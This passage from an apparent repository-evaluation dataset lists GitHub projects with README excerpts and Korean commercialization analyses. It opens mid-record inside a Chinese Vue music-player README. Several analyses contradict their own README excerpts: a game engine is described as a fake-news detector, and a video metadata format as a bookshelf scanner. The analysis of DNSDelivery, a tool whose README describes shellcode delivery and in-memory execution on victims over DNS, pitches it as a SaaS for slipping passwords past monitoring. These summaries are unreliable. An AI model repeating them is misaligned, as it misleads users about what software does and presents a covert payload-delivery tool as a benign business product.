前言\n\n网上目前已经有了很多vue写的音乐播放器。但是本胖还是想自己踩一遍坑，毕竟自己踩的坑以后印象才会最深。主要是因为本胖这1年多都是在做商城购物类型网站，对音乐视频这方面没有踩坑经验，所以就很想来踩坑哈。<br/>\n\n# 项目总结\n\n1.歌词同步<br/>\n接口返回的是每段歌词前面带有时间点的字符串。先要把字符串转为为数组，并且将每段歌词前的时间点转为为以秒为单位的时间格式存在一个数组里面，注意渲染歌词的时候，只能渲染一个数组（也就是歌词数组，歌词时间数组和歌词数组的index是同一个的）。然后只需要控制歌词容器的WebkitTransform就行了，最好是让初始化的时候第一行歌词在包裹容器的中间，然后一步步往上移动。<br/>\n2.音乐后台播放<br/>\n这一点，一开始我做的只能在播放组件里面播放音乐，后来把audio标签放APP.vue里面然后把控制他的一些变量放vuex里面就可以实现音乐在后台播放。<br/>\n3.对于同一首歌，比如在播放烟花易冷的时候，再点击播放烟花易冷，audio不会自动从头开始播放，会继续播放下去。这样就造成了历史记录里面如果只有一首歌，你点击下一首，播放组件并没有什么反应的bug。解决方法就是手动重置audio的src属性<br/>\n\n## 技术栈\n\nvue2 + vue-cli + vuex + vue-router + webpack + ES6/7 \n\n\n## 关于 数据接口 的说明\n\n这个项目用到的接口都是来自这里的。\n\n## 项目运行\n\n\n```\n运行接口\ngit clone https://github.com/Binaryify/NeteaseCloudMusicApi.git\n\ncd NeteaseCloudMusicApi\n\nnpm install \n\nnode app.js\n\n运行该项目\ngit clone https://github.com/lvpangpang/cloud-music.git \n\ncd cloud-music\n\nnpm ","composite_score":0.3017,"license_safety_tag":"unknown"},{"name":"nations/spoticord","github_url":"https://github.com/nations/spoticord","stars":6,"language":"JavaScript","license":"unknown","abandonment_months":49,"description":"# Spoticord 저장소 분석\n\n## 왜 보물인가\n음악 스트리밍 플랫폼(스포티파이)과 채팅 앱(디스코드)을 연결하는 도구로, 친구들과 음악을 실시간으로 공유하고 함께 즐길 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 디스코드 사용자들이 월 구독료를 내고 음악 공유 기능을 사용하는 웹 서비스\n2. **내부 업무 도구**: ","readme_excerpt":"# **Deprecated**\n**In favor of [Discord's Spotify Connection](https://support.discordapp.com/hc/en-us/articles/360000167212).**\n\n# spoticord `0.0.4` [![discordxd](https://discordapp.com/api/guilds/297142682894073856/embed.png)](https://discord.gg/nations)\n**Display your current Spotify song on Discord using the RPC API:**\n![N|Solid](https://s.phineas.io/share/68747470733acx.png)\n\n## Dependencies\n  - NodeJS >=8\n  - npm (>=5) or Yarn (>=1.2)\n  - Discord Canary (preferred)\n  - Spotify >= 1.0\n  - Git\n\n## Setup\n\n  - Clone the repo `git clone https://github.com/nations/spoticord.git`\n  - Install the modules `npm i` or `yarn`\n  - Open Discord & Spotify\n  - Start the RPC app `node app.js`\n  \n## How to run in the background\n\n  - Install pm2 `npm i pm2 -g`\n  - Start the app `pm2 start app.js --name=\"spoticord\"`\n  - Use `pm2 log spoticord` to view the logs\n  - Restart the app using `pm2 restart spoticord`\n\n## Updating\n  - To update SpotiCord, enter the \"spoticord\" directory and run `git fetch` in","composite_score":0.3017,"license_safety_tag":"unknown"},{"name":"parkjs814/AlgorithmVisualizer","github_url":"https://github.com/parkjs814/AlgorithmVisualizer","stars":5,"language":"HTML","license":"mit","abandonment_months":91,"description":"# AlgorithmVisualizer 상용화 분석\n\n## 왜 보물인가\n복잡한 알고리즘을 애니메이션으로 보여주어 누구나 직관적으로 이해할 수 있는 학습 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 교육 플랫폼(SaaS)**: 코딩 학원이나 대학의 온라인 강의에 임베드하여 알고리즘 이해도를 높이는 학습 보조 도구로 판매\n2. **기업 채용 면접 도","readme_excerpt":"","composite_score":0.3017,"license_safety_tag":"safe"},{"name":"Arno0x/DNSDelivery","github_url":"https://github.com/Arno0x/DNSDelivery","stars":5,"language":"PowerShell","license":"unknown","abandonment_months":81,"description":"# DNSDelivery 저장소 분석\n\n## 왜 보물인가\n인터넷 주소(DNS)를 이용해 숨겨진 정보를 안전하게 전달하는 기술로, 기존의 직접적인 통신 방식을 우회할 수 있는 독창적인 솔루션입니다.\n\n## 어디에 쓸 수 있나\n\n1. **기업 보안 업체의 SaaS 서비스**: 직원들의 민감한 정보(승인 토큰, 비밀번호)를 감시자들의 눈을 피해 안전하게 전달하는","readme_excerpt":"DNS Delivery\r\n============\r\n\r\nAuthor: Arno0x0x - [@Arno0x0x](http://twitter.com/Arno0x0x)\r\n\r\nDNSDelivery provides delivery and in memory execution of shellcode or .Net assembly using DNS requests delivery channel.\r\n\r\nDNSDelivery has to sides:\r\n  1. The server side, coming as a single python script (`dnsdelivery.py`), which acts as a custom DNS server, serving the payload data\r\n  2. The client side (*victim's side*), which comes in two flavors:\r\n    - `dnsdelivery.cs`: a C# script that can be compiled with `csc.exe` to provide a Windows managed executable\r\n    - `Invoke-DNSDelivery.ps1`: a PowerShell script providing the exact same functionnalities\r\n\r\nIn order for the whole thing to work **you need to own your domain name** and set the DNS record for that domain to point to the server that will run the `dnsdelivery.py` server side.\r\nFor local testing purposes though, you can configure the client side scripts to point to any DNS server.\r\n\r\nDependencies\r\n----------------------\r\n\r\nThe only","composite_score":0.3017,"license_safety_tag":"unknown"},{"name":"hgDendi/ExpandableRecyclerView","github_url":"https://github.com/hgDendi/ExpandableRecyclerView","stars":5,"language":"Java","license":"mit","abandonment_months":104,"description":"# ExpandableRecyclerView 분석\n\n## 왜 보물인가\n스마트폰 앱에서 목록을 펼쳤다 접었다 할 수 있게 해주는 기술로, 사용자 경험을 크게 개선할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **모바일 앱 개발 도구 판매**: 앱 개발사들에게 이 기술이 포함된 개발 프레임워크를 SaaS 구독 형태로 제공\n2. **기업 내부 업무 앱**: ","readme_excerpt":"# ExpandableRecyclerView\n\n[【中文README】](https://github.com/hgDendi/ExpandableRecyclerView/blob/master/README_CN.md)\n\nCustomized recyclerViewAdapter which shows items in a 2-level list.\n\n![demo](https://github.com/hgDendi/ExpandableRecyclerView/blob/master/img/expandableRecyclerView.gif)\n\nIt encapsulates the **expand and fold operation** in abstract class [BaseExpandableListAdapter](https://github.com/hgDendi/ExpandableRecyclerView/blob/master/expandablerecycleradapter/src/main/java/com/hgdendi/expandablerecycleradapter/ExpandableRecyclerViewAdapter.java),which makes it flexible.\n\nSee the usage below , all you need to do is just extending the class and overriding these 6 methods:\n\n* **getGroupCount**\n* **getGroupItem**\n* onCreateGroupViewHolder\n* onCreateChildViewHolder\n* onBindGroupViewHolder\n* onBindChildViewHolder\n\nAs onCreateViewHolder & onBindViewHolder are compulsive methods which need developers to override. All your extra work is overriding getGroupCount & getGroupPosition. In mo","composite_score":0.3017,"license_safety_tag":"safe"},{"name":"mdbootstrap/bootstrap-material-design","github_url":"https://github.com/mdbootstrap/bootstrap-material-design","stars":5,"language":"CSS","license":"mit","abandonment_months":53,"description":"# Bootstrap Material Design 저장소 분석\n\n## 왜 보물인가\n웹사이트를 만들 때 필요한 예쁜 디자인 요소들을 미리 만들어두어 개발 시간을 크게 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 스타트업의 관리자 대시보드나 사용자 인터페이스를 빠르게 구축하는 데 활용\n2. **내부 업무 도구**: 기업의 직원","readme_excerpt":"This project has been moved here:\n[mdbootstrap.com/docs/standard/](mdbootstrap.com/docs/standard/)\n","composite_score":0.3017,"license_safety_tag":"safe"},{"name":"gouguoyin/phprap","github_url":"https://github.com/gouguoyin/phprap","stars":7,"language":"HTML","license":"unknown","abandonment_months":58,"description":"# phprap 오픈소스 분석\n\n## 왜 보물인가\n개발자들이 API 문서를 자동으로 만들고 관리할 수 있는 도구로, 회사의 개발 생산성을 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: API 문서 자동 생성 서비스로, 개발사들이 월 구독료를 내고 사용하는 플랫폼\n2. **내부 업무 도구**: 중소 IT회사의 개발팀이 자","readme_excerpt":"[PHPRAP，是一个PHP轻量级开源API接口文档管理系统，致力于减少前后端沟通成本，提高团队协作开发效率，打造PHP版的RAP。](http://www.phprap.com)\n\n >版本说明\n - master：稳定版本，建议下载安装，下载[源码](https://gitee.com/gouguoyin/phprap/repository/archive/master.zip)\n - develop：开发版本，功能最新，但不稳定，不建议下载安装 \n \n## 相关\n - 官方网站：[www.phprap.com](http://www.phprap.com)\n - 演示网站：[demo.phprap.com](http://demo.phprap.com)\n - 使用文档：[www.phprap.com/wiki](http://www.phprap.com/wiki/index.html)\n - robeeask社区：[http://phprap.robeeask.com](https://phprap.robeeask.com/)\n \n## 特性\n\n - 基于YII2框架开发，架构合理，性能卓越，具有高度的可重用性和可扩展性；\n - 部署简单，提供在线安装程序，只需填写少量信息即可完成安装部署，开箱即用；\n - 操作简单，和阿里RAP高度一致的操作流程，给力的用户体验，让您一分钟上手；\n - 基于bootstrap搭建，完美适配PC、平板和移动端；\n - 项目申请时时推送，方便项目创建者及时处理申请；\n - 完整的项目操作日志，整个项目的操作流程一目了然；\n - 完善的权限控制系统，可以分别控制成员的项目、环境、模块、接口操作权限；\n - 支持在线对接口进行调试，默认填充已定义好的header和请求参数，再也不用在postman中手动添加参数来调试接口;\n - 提供MOCK服务，根据接口文档自动生成模拟数据，支持复杂的生成逻辑，支持请求协议、请求方式和请求参数格式校验;\n - MOCK数据类型丰富，支持生成随机的文本、数字、布尔值、日期、邮箱、链接、图片、颜色、中文名、手机号、价格、邮箱、网址等;\n - 支持项目整体一键导出HTML文档，方便离线传阅查看；\n - 支持接口单独导出HTML文档，方便离线传阅查看；\n - 产品开源免费，并将持续提供免费的社区技术","composite_score":0.3017,"license_safety_tag":"unknown"},{"name":"fossasia/fossasia-companion-android","github_url":"https://github.com/fossasia/fossasia-companion-android","stars":11,"language":"Java","license":"apache-2.0","abandonment_months":55,"description":"# FOSSASIA Companion Android 분석\n\n## 왜 보물인가\nFOSSASIA 행사 참석자들이 일정, 지도, 강연자 정보를 한 앱에서 확인할 수 있는 공식 모바일 앱으로, 대규모 컨퍼런스 운영을 효율적으로 지원합니다.\n\n## 어디에 쓸 수 있나\n1. **컨퍼런스/전시회 주최사**: 자체 행사용 모바일 앱을 직접 개발하지 않고 이 코드를 구매해","readme_excerpt":"# FOSSASIA Companion\n\n## How to build\n\nAll dependencies are defined in ```app/build.gradle```. Import the project in Android Studio or use Gradle in command line:\n\n```\n./gradlew assembleRelease\n```\n\nThe result apk file will be placed in ```app/build/outputs/apk/```.\n\n## Pending Task\n* Download schedule in a background thread\n* Notification for Bookmarked Events/Talks\n* Integrate Google+ login or any other mechanism to fetch user email address [TBD](https://github.com/fossasia/fossasia-companion-android/issues/68)\n* Integrate Google Maps\n\n\n\n\n## License\n\n[Apache License, Version 2.0](http://www.apache.org/licenses/LICENSE-2.0)\n\n## Used libraries\n\n* [Android Support Library](http://developer.android.com/tools/support-library/) by The Android Open Source Project\n* [ViewPagerIndicator](http://viewpagerindicator.com/) by Jake Wharton\n* [PhotoView](https://github.com/chrisbanes/PhotoView) by Chris Banes\n* [Volley Library](https://android.googlesource.com/platform/frameworks/volley)\n\n## Contri","composite_score":0.3017,"license_safety_tag":"safe"},{"name":"maebert/jrnl","github_url":"https://github.com/maebert/jrnl","stars":81,"language":"Python","license":"mit","abandonment_months":25,"description":"# jrnl 저장소 분석\n\n## 왜 보물인가\n복잡한 기능 없이 텍스트만으로 일상을 기록하고 검색할 수 있는 간단한 일기장 도구로, 많은 사람들이 일기 쓰기를 꾸준히 하고 싶어 하는 수요를 충족시킵니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 월 구독 기반의 클라우드 일기장 앱으로 여러 기기에서 자동 동기화 제공\n- **내부 업무 도구**: ","readme_excerpt":"<!--\nCopyright © 2012-2023 jrnl contributors\nLicense: https://www.gnu.org/licenses/gpl-3.0.html\n-->\n\n<p align=\"center\">\n<a href=\"https://jrnl.sh\">\n<img align=\"center\" src=\"https://raw.githubusercontent.com/jrnl-org/jrnl/develop/docs_theme/assets/readme-header.png\"/>\n</a>\n</p>\n\njrnl\n [![Testing](https://github.com/jrnl-org/jrnl/workflows/Testing/badge.svg)](https://github.com/jrnl-org/jrnl/actions?query=workflow%3ATesting)\n [![Downloads](https://pepy.tech/badge/jrnl)](https://pepy.tech/project/jrnl)\n [![Version](http://img.shields.io/pypi/v/jrnl.svg?style=flat)](https://pypi.python.org/pypi/jrnl/)\n [![Homebrew](https://img.shields.io/homebrew/v/jrnl?style=flat-square)](https://formulae.brew.sh/formula/jrnl)\n [![Gitter](https://img.shields.io/gitter/room/jrnl-org/jrnl)](https://gitter.im/jrnl-org/jrnl)\n [![Changelog](https://img.shields.io/badge/changelog-on%20github-green)](https://github.com/jrnl-org/jrnl/blob/develop/CHANGELOG.md)\n====\n\n_To get help, [submit an issue](https://github.c","composite_score":0.3017,"license_safety_tag":"safe"},{"name":"kenwheeler/hooks-drum-machine","github_url":"https://github.com/kenwheeler/hooks-drum-machine","stars":14,"language":"JavaScript","license":"unknown","abandonment_months":51,"description":"# hooks-drum-machine 분석 보고서\n\n## 왜 보물인가\n웹 브라우저에서 바로 사용할 수 있는 드럼머신(리듬악기)으로, 음악 교육이나 창작 활동을 누구나 쉽게 경험할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n1. **음악 교육 SaaS**: 초보자를 위한 온라인 리듬감 훈련 플랫폼으로 구독형 서비스화\n2. **음악 제작 도구**: 프로듀서","readme_excerpt":"# hooks-drum-machine\n\nSimple step sequencer built with React Hooks\n\n## How to skrrt\n\n- Run `npm start`\n- Be dope\n","composite_score":0.3016,"license_safety_tag":"unknown"},{"name":"nandorojo/moti","github_url":"https://github.com/nandorojo/moti","stars":6,"language":"TypeScript","license":"MIT","abandonment_months":15,"description":"# nandorojo/moti 분석 보고서\n\n## 왜 보물인가\n모바일 앱에서 부드러운 애니메이션 효과를 쉽게 만들 수 있는 도구로, 앱의 사용자 경험을 획기적으로 향상시킬 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 피트니스 앱, 명상 앱 등 사용자 참여도가 중요한 모바일 서비스에 내장하여 구독료 인상\n2. **내부 업무 도구*","readme_excerpt":"<img src=\"/assets/banner2.png\" />\n\nThe universal React Native animation library, powered by Reanimated 3.\n\n```jsx\n<MotiView from={{ opacity: 0 }} animate={{ opacity: 1 }} />\n```\n\n# Documentation & Examples\n\n- [Documentation](https://moti.fyi)\n- [Installation](https://moti.fyi/installation)\n- [Examples](https://moti.fyi/examples/hello-world) *(please use Chrome, other browsers are partially supported)*\n\n## Next.js Conf\n\n<img\n  width=\"1779\"\n  alt=\"Screen Shot 2021-10-22 at 3 00 05 PM\"\n  src=\"https://user-images.githubusercontent.com/13172299/138509139-412b2d32-841b-4a7e-950e-f8721c1da17f.png\"\n/>\n\nI spoke at at [Next.js Conf 2021](https://fernandorojo.co/conf) on October 26 about React Native + Next.js. [Watch the video](https://t.co/LkmxHXVz3K?amp=1) to see how we do it.\n\n# Highlights\n\n- Universal: works on all platforms\n- 60 FPS animations on the native thread\n- Mount/unmount animations, like `framer-motion`\n- Powered by Reanimated 3\n- Web support, out-of-the-box\n- Expo support\n- Intuit","composite_score":0.3016,"license_safety_tag":"safe"},{"name":"Cattle521/PSINS-Develop-Group","github_url":"https://github.com/Cattle521/PSINS-Develop-Group","stars":12,"language":"C++","license":"unknown","abandonment_months":90,"description":"# Cattle521/PSINS-Develop-Group 평가\n\n## 왜 보물인가\n항법 시스템의 정확도를 높이는 기술로, 자동차·드론·로봇 같은 이동 기기들이 GPS 신호가 약한 실내나 터널에서도 제대로 길을 찾을 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n\n**1. 자율주행 택시 서비스**\n- 실내 주차장이나 터널에서도 정확한 위치 추적이 가능한 항법","readme_excerpt":"2018.12.1 Create repository!","composite_score":0.3016,"license_safety_tag":"unknown"},{"name":"nice-boys/product-boilerplate","github_url":"https://github.com/nice-boys/product-boilerplate","stars":6,"language":"TypeScript","license":"unknown","abandonment_months":42,"description":"# nice-boys/product-boilerplate 평가 보고서\n\n## 왜 보물인가\n새로운 온라인 서비스를 빠르게 만들 때 반복되는 기초 작업을 미리 준비해둔 템플릿으로, 개발 시간을 크게 단축할 수 있습니다.\n\n## 어디에 팔 수 있나\n1. **SaaS 서비스**: 스타트업이 CRM, 프로젝트 관리, 협업 도구 같은 웹 기반 서비스를 빠르게 론칭할 ","readme_excerpt":"# REPLACED BY [BEDROCK](https://bedrock.mxstbr.com)\n\nWhile you can still use this boilerplate, it's very out of date. [Bedrock](https://bedrock.mxstbr.com) is @mxstbr's attempt at building a sustainable business out of a boilerplate in order to allow it to stay up to date.\n\nIf you're looking to build a SaaS product, check it out!\n\n----\n\nQuickly ship your apps with the power of code generation.\n\n## Philosophy\n\n> \"Speed of developer iteration is the single most important factor in how quickly a technology company can move.\"\n>\n> — Paul Biggar, cofounder CircleCI\n\nProduct boilerplate is [@brianlovin](https://github.com/brianlovin) and [@mxstbr](https://github.com/mxstbr)'s personal setup to quickly build new apps. It aims to get all the common stuff out of the way and make shipping and subsequently iterating on a product as quick as possible.\n\nThere are three important traits in all the included tooling that we pay attention to:\n\n1. **Mastery**: We know most of these tools inside and out a","composite_score":0.3016,"license_safety_tag":"unknown"},{"name":"xuningjack/AndroidNet","github_url":"https://github.com/xuningjack/AndroidNet","stars":5,"language":"Java","license":"unknown","abandonment_months":102,"description":"# AndroidNet 저장소 분석\n\n## 왜 보물인가\n스마트폰 앱에서 인터넷 통신을 간편하게 처리할 수 있는 도구로, 앱 개발자들의 반복적인 작업을 크게 줄여줍니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 모바일 앱 개발사를 위한 개발 도구 구독 서비스로 제공\n2. **내부 업무 도구**: 대형 IT회사의 앱 개발팀이 사내 표준 라이브러","readme_excerpt":"# AndroidNet\n本项目涵盖了JAVA网络、Android网络操作（网络请求、WebView相关、常用第三方框架OkHttp&amp;Volley）\n\n\n## 1 JavaSocketDemo  \n本demo演示了InetAddress、URL的用法，模拟单客户端、多客户端的socket和udp的通信。  \n\n## 2 AndroidHttpDemo  \n本demo演示了使用HttpClient、HttpUrlConnection发送网络请求。  \n\n## 3 WebViewDemo \n本demo演示了js与java原生代码的交互，还有通过html与java原生代码的交互。  \n\n\n## 4 VolleyDemo  \n本demo演示了volley的常规使用和封装。  \n\nVolley Module中封装了自定义的请求对象CustomVolleyRequest和请求回调VolleyListener。  \n使用其封装get请求如下：\n    /**  \n\t * 使用自定义的get方式请求数据，二次封装  \n\t */  \n\tprivate void volleyCustomGet(){   \n&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;CustomVolleyRequest.requestGet(url, \"volleyCustomGet\", \n\t\tnew VolleyListener(this, VolleyListener.mListener, VolleyListener.mErrorListener) {  \n&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;@Override  \n&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;public void onMySuccess(String response) {  \n&#160;&#160;&#160;&#160;","composite_score":0.3016,"license_safety_tag":"unknown"},{"name":"facebookresearch/FashionPlus","github_url":"https://github.com/facebookresearch/FashionPlus","stars":5,"language":"Python","license":"NOASSERTION","abandonment_months":58,"description":"# FashionPlus 저장소 분석\n\n## 왜 보물인가\n페이스북 연구팀이 만든 이 프로젝트는 옷 사진을 분석해서 어떤 옷이 잘 어울리는지 자동으로 추천해주는 AI 기술입니다.\n\n## 어디에 쓸 수 있나\n\n1. **온라인 쇼핑 플랫폼의 스타일 추천 서비스**: 고객이 옷을 사면 그에 맞는 다른 상품을 자동으로 추천해 구매를 늘릴 수 있습니다.\n\n2. **가","readme_excerpt":"# Fashion++: Minimal Edits for Outfit Improvement\n[Wei-Lin Hsiao](http://www.cs.utexas.edu/~kimhsiao/),\n[Isay Katsman](https://vision.cornell.edu/se3/people/isay-katsman/)\\*,\n[Chao-Yuan Wu](https://www.cs.utexas.edu/~cywu/)\\*,\n[Devi Parikh](https://www.cc.gatech.edu/~parikh/),\n[Kristen Grauman](http://www.cs.utexas.edu/~grauman/)<br/>\nIn ICCV 2019.  [[paper]](https://arxiv.org/abs/1904.09261)\n\n![concept figure](figures/demo_high_res.gif)\n\n## Installation\nThis project is tested on Ubuntu 18.04, with python 3.6.4, pytorch 0.4\n* Install pytorch >= 0.4 following instructions from https://pytorch.org/\n* Install python library dominate\n```\npip install dominate\n```\n* Install python library opencv\n```\npip install opencv-python\n```\n* Clone this repo:\n```\ngit clone https://github.com/facebookresearch/FashionPlus.git\n```\n## Demo\n1. Download pretrained models from:\n\n   | Model | file name   |                           link                                |\n   |-------|-------------|----------------","composite_score":0.3016,"license_safety_tag":"unknown"},{"name":"ricequant/rqalpha-mod-ctp","github_url":"https://github.com/ricequant/rqalpha-mod-ctp","stars":7,"language":"Python","license":"apache-2.0","abandonment_months":97,"description":"# ricequant/rqalpha-mod-ctp 사업화 분석\n\n## 왜 보물인가\n선물 시장에서 자동으로 매매 거래를 실행하는 기술로, 투자자들이 수익 창출을 자동화할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n1. **자동 매매 SaaS**: 개인 투자자가 웹에서 자신의 매매 전략을 등록하면 자동으로 주문이 체결되는 구독 서비스\n2. **증권사 내부 ","readme_excerpt":"# RQAlpha-mod-ctp\n\nRQAlpha 对接 CTP 的扩展 Mod。通过启用该 Mod 来实现期货策略的实盘交易。目前本模块仍处在正式发布前的测试阶段，您可以下载参与测试并开 Issue 提交 bug，也欢迎您提交代码，参与开发。\n\n该 Mod 底层引用了 [PyCTP](https://github.com/lovelylain/pyctp), 一些函数的封装和写法参考了 [VN.PY](https://github.com/vnpy/vnpy)。\n\n\n## 量化社区\n\n[Ricequant](http://www.ricequant.com) 旨在为量化爱好者提供可靠、易用的工具。与此同时我们也搭建了一个量化社区供大家探讨与交流回测框架、策略。欢迎大家前来分享自己对于量化交易的理解。\n\n## 环境要求\n\n该 Mod 支持 python 2.7, 3.4, 3.5，暂时仅支持 Linux，后续会加入 windows 支持。\n\n## 安装\n\n```bash\n\nrqalpha mod install ctp\n\n```\n\n或者将源代码克隆，并在安装目录执行 \n\n```bash\n\nrqalpha mod install -e .\n\n```\n\n## 配置项\n\n您需要在配置项中填入您的 CTP 账号密码等信息，您可以在 simnow 官网 申请实盘模拟账号。\n配置项的使用与 RQAlpha 其他 mod 无异\n\n```python\n\n{   \n    # CTP 登录信息\n    \"login\": {\n        'user_id': None,\n        'password': None,\n        'broker_id': \"9999\",\n    },\n    # 事件相关设置\n    \"event\": {\n        # 是否使用默认的 CTP 实时数据源\n        \"enabled\": True,\n        # 是否在非交易时间段内触发行情事件\n        \"all_day\": False,\n        \"address\": \"tcp://180.168.212.228:41213\",\n    },\n    # 交易相关设置\n    \"trade\": {\n        # 是否使用默认的 CTP 交易接口\n  ","composite_score":0.3015,"license_safety_tag":"safe"},{"name":"ex2tron/OpenCV-Python-Tutorial","github_url":"https://github.com/ex2tron/OpenCV-Python-Tutorial","stars":5,"language":"","license":"unknown","abandonment_months":72,"description":"# OpenCV-Python-Tutorial 상용화 분석\n\n## 왜 보물인가\n사진이나 영상을 자동으로 분석하고 처리하는 기술을 배우는 교육 자료로, 스마트폰 카메라 앱부터 보안 시스템까지 실생활의 많은 기술 뒤에 숨어있는 핵심 개념을 알 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 영상 분석 SaaS 플랫폼**\n- 건설 현장 안전 점검: 헬멧 미착용","readme_excerpt":"教程地址已变更，谢谢大家🙂：\n\n- 新: https://github.com/CodecWang/OpenCV-Python-Tutorial\n- 旧: https://github.com/CodecWang/OpenCV-Python-Tutorial/tree/3.x\n","composite_score":0.3015,"license_safety_tag":"unknown"},{"name":"etodd/deceiver","github_url":"https://github.com/etodd/deceiver","stars":5,"language":"C++","license":"unknown","abandonment_months":82,"description":"# etodd/deceiver 프로젝트 분석\n\n## 왜 보물인가\n정보의 진위를 자동으로 판단하고 거짓 정보를 감지할 수 있는 기술로, 신뢰성이 중요한 모든 온라인 서비스에서 활용될 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **콘텐츠 검증 SaaS**: 뉴스 기사, 소셜 미디어 게시물의 신뢰도를 자동 판별하는 구독형 서비스\n- **전자상거래 내부 도구**","readme_excerpt":"LASERCRABS\n==========\n\nFeatures\n--------\n\n- [Simple multi-threaded architecture](http://etodd.io/2016/01/12/poor-mans-threading-architecture/) -\nseparate threads for physics, rendering, AI, and game logic\n- Entity/component system\n- Linear math suite somewhat stolen from Ogre\n- Content pipeline supporting .blend, .glsl, .otf, .png\n- Create levels, models, animations, and ragdoll rigs in Blender\n- Deferred rendering, cascaded shadow maps, edge detection, bloom, SSAO, weather effects\n- Geometry-based font rendering and UI system\n- [Online multiplayer](http://etodd.io/2018/02/20/poor-mans-netcode/)\n- Online user profile system via [sqlite](https://sqlite.org/)\n- Authentication via [Steam](http://store.steampowered.com/), [itch.io](https://itch.io), or [GameJolt](https://gamejolt.com)\n- Localization support\n- Simple Windows crash report system\n- Keyboard/mouse/gamepad support via SDL\n- Automatic navmesh generation with realtime mutations via Recast\n- Audio via Wwise\n- Physics via Bullet\n- ","composite_score":0.3015,"license_safety_tag":"unknown"},{"name":"keijiro/Bibcam","github_url":"https://github.com/keijiro/Bibcam","stars":8,"language":"C#","license":"Unlicense","abandonment_months":15,"description":"# Bibcam 저장소 분석\n\n## 왜 보물인가\n카메라로 촬영한 책장을 인식하여 장서 목록을 자동으로 관리해주는 독창적인 도구로, 책 애호가와 도서관에게 수동 입력의 번거로움을 획기적으로 줄여줄 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 개인 도서 관리 SaaS**\n- 사용자가 책장 사진을 업로드하면 자동으로 보유 도서 목록이 만들어지고, 독서 기","readme_excerpt":"Metavido - Metadata Embedding Video Subformat\n==============================================\n\n![gif](https://user-images.githubusercontent.com/343936/142789278-4ede7318-e789-4d32-ad99-06ff90e91b20.gif)\n![gif](https://user-images.githubusercontent.com/343936/142789286-f7ba3b96-c176-4687-aa58-170f2e166855.gif)\n\n**Metavido** (formerly known as *Bibcam*) is a video subformat that embeds\ncamera metadata directly into video frames using a burnt-in-barcode technique.\nIt also integrates non-color planes, such as depth information and human\nstencil, into the frame through a squeezing method.\n\n![Planes](https://user-images.githubusercontent.com/343936/142789292-9bba9330-0fa0-49f8-b270-9bcefe326278.png)\n\nMetavido enables recording, editing, and playback of AR-ready video clips\nwithout the need to worry about desynchronization with external tracking data.\n\nSystem Requirements\n-------------------\n\n- Unity 6\n- A LiDAR-enabled iOS device for recording\n\nHow to Try\n----------\n\nTo try Metavido, start by","composite_score":0.3015,"license_safety_tag":"unknown"},{"name":"fossasia/wp-tweetscroll-widget","github_url":"https://github.com/fossasia/wp-tweetscroll-widget","stars":10,"language":"HTML","license":"unknown","abandonment_months":53,"description":"# wp-tweetscroll-widget 상용화 분석\n\n## 왜 보물인가\n트위터 게시물을 웹사이트에 자동으로 표시해주는 도구로, 웹사이트 운영자들이 별도의 코딩 없이 소셜 미디어 콘텐츠를 활용할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 중소 브랜드를 위한 \"웹사이트 소셜 피드 자동화 서비스\" - 월 구독으로 여러 SNS","readme_excerpt":"https://2021.fossasia.org\r\n","composite_score":0.3015,"license_safety_tag":"unknown"},{"name":"fossasia/engelsystem","github_url":"https://github.com/fossasia/engelsystem","stars":11,"language":"CSS","license":"gpl-2.0","abandonment_months":39,"description":"# Engelsystem 프로젝트 분석\n\n## 왜 보물인가\n대규모 행사나 축제에서 자원봉사자들을 효율적으로 모집하고 관리할 수 있는 통합 시스템으로, 조직 담당자의 운영 부담을 크게 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스**: 음악 페스티벌, 컨퍼런스, 스포츠 이벤트 주최자들이 월 구독으로 자원봉사자 모집·일정 관리·커뮤니","readme_excerpt":"\n[![Code Climate](https://codeclimate.com/github/fossasia/engelsystem/badges/gpa.svg)](https://codeclimate.com/github/fossasia/engelsystem)\n[![Build Status](https://travis-ci.org/fossasia/engelsystem.svg?branch=documentation)](https://travis-ci.org/fossasia/engelsystem)\n[![Codacy Badge](https://api.codacy.com/project/badge/Grade/d56c5bb224f24946965770230e7253c2)](https://www.codacy.com/app/dishant-khanna1807/engelsystem_2?utm_source=github.com&amp;utm_medium=referral&amp;utm_content=fossasia/engelsystem&amp;utm_campaign=Badge_Grade)\n[![CircleCI](https://circleci.com/gh/fossasia/engelsystem/tree/development.svg?style=svg)](https://circleci.com/gh/fossasia/engelsystem/tree/development)\n[![Dependency Status](https://www.versioneye.com/user/projects/577c9495b50608003eee0161/badge.svg?style=flat-square)](https://www.versioneye.com/user/projects/577c9495b50608003eee0161)\n[![Dependency Status](https://gemnasium.com/badges/github.com/fossasia/engelsystem.svg)](https://gemnasium.com/github.com/","composite_score":0.3015,"license_safety_tag":"restricted"},{"name":"vedetta-com/vedetta","github_url":"https://github.com/vedetta-com/vedetta","stars":7,"language":"Shell","license":"isc","abandonment_months":83,"description":"# Vedetta-com/vedetta 분석 보고서\n\n## 왜 보물인가\n오래되고 관리가 중단된 프로젝트(2019년 이후 업데이트 없음)로, 현재 상태에서는 상업적 가치보다는 역사적·기술 학습 자료로의 가치가 제한적입니다.\n\n## 어디에 쓸 수 있나\n1. **내부 업무 도구**: 소규모 팀의 자동화된 